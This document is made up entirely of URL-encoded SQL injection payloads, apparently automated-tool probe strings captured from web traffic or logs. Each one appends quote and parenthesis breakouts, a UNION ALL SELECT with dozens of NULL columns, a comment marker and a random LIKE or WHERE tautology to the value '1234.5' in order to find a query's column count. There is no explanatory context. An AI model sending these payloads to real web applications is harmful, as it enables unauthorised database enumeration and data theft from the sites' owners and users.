1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22BYyn%22%20LIKE%20%22BYyn 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22BYkU%22%20LIKE%20%22BYkU 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22DMWs%22%20LIKE%20%22DMWs 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22GVJk%22%20LIKE%20%22GVJk 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22jJke%22%20LIKE%20%22jJke 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22NFZi%22%20LIKE%20%22NFZi 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22tTcb%22%20LIKE%20%22tTcb 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22TigJ%22%20LIKE%20%22TigJ 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22Hvoe%22%20LIKE%20%22Hvoe 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22aQxk%22%20LIKE%20%22aQxk 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22XNxk%22%20LIKE%20%22XNxk 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22SgWx%22%20LIKE%20%22SgWx 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22HeFQ%22%20LIKE%20%22HeFQ 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22aZer%22%20LIKE%20%22aZer 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22CoXV%22%20LIKE%20%22CoXV 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22yorl%22%20LIKE%20%22yorl 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22uLmd%22%20LIKE%20%22uLmd 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22EokH%22%20LIKE%20%22EokH 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22JoRq%22%20LIKE%20%22JoRq 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22DDJr%22%20LIKE%20%22DDJr 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22THPq%22%20LIKE%20%22THPq 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22WXey%22%20LIKE%20%22WXey 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22uYyb%22%20LIKE%20%22uYyb 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22LHkA%22%20LIKE%20%22LHkA 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22YqYb%22%20LIKE%20%22YqYb 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22AdPW%22%20LIKE%20%22AdPW 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22thpo%22%20LIKE%20%22thpo 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22TpHC%22%20LIKE%20%22TpHC 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22HavA%22%20LIKE%20%22HavA 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22iJdl%22%20LIKE%20%22iJdl 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22uJqB%22%20LIKE%20%22uJqB 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22HNdm%22%20LIKE%20%22HNdm 1234.5%29%20WHERE%206745%3D6745%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%202035%3D2035%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%206710%3D6710%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 